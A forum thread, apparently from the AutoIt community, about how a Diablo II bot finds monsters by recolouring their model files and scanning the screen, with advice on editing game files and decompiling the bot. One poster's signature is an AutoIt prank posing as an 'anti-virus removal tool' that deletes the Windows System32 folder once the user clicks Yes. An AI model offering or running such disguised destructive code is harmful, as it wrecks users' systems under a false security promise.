interesting question :)

lockieday

hi,

ive got to know how to use auto it v3 lately (still a noob but hey im learning). and ive been using a program for a game i play, some of you might know it the program is called mmbot. for diablo2. and it uses auto it v3 to navigate around and when it gets to a sertian spot the monsters it wants to kill dont look like monsters just squares of colour the move around. the squares of colour in turn make my character or bot to attack them. my question is how would i be able to make something like that? and set squares for monsters i want to kill?

Well I guess the program changes the way the monsters look by changing the character model (This is somewhere in the Program Folder for Diablo). They probably change it to just a square of color (whatever color they want, let's say hot pink) Then they get autoit to search the screen for that color. And after it finds it, it attacks.

;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf

If I had the game installed I could probably help, but I don't.

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

If I had the game installed I could probably help, but I don't.

i dont think you should need the game to help :) seeing as i have quite a while to figure it out. it should be the same for any game. i need to make a little file that my diablo2 runs in its parameters so the monsters i want to kill are say a square of hot pink. it works with virtualy any game i would suspect just the monsters would be different

Well if you're lucky the the monster will be a .bsp (I think that's the extension). If it is you can easily edit it. You'll have to change the monster to be a blob of color (#FF69B4 - Hot Pink, I'm 100% sure this color isn't anywhere else in the game) yourself.

Edited by Firefoxy

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

Well if you're lucky the the monster will be a .bsp (I think that's the extension). If it is you can easily edit it. You'll have to change the monster to be a blob of color (#FF69B4 - Hot Pink, I'm 100% sure this color isn't anywhere else in the game) yourself.

im in luck. theres a monster file and there are soooo many in there but for mmbot there are 2 files there called "greenblood.dat" and "redtransforms.dat" so those are the two that mmbot loads within the d2 parameters :)

If you can change them then go ahead. Just note what color you change them to!

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

And if that mmbot was made with AutoIt could you send it to me? I, or you, could decompile it and use theirs for help.

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

Here's one of my spam addresses: dothalo@gmail.com

(I sign up for sites with this so there's a lot of spam)

Edited by Firefoxy

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

Didn't recieve it.

Try this:

Start > All Programs > AutoItv3 > Extras > Decompile .exe to AutoIt Script.

Try to decompile it and if it works just paste the code in a message.

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

Try leaving it blank, I guress

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

Another noob post, that should be in the game bots forum....

I hate bots! Cheaters

Well...if he's not doing it online then who cares. But if he is online...well...life's a b**ch. I wouldn't say cheating, since he can do this easily. It just cuts down on boring, time-wasting, tasks.

Edited by Firefoxy

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf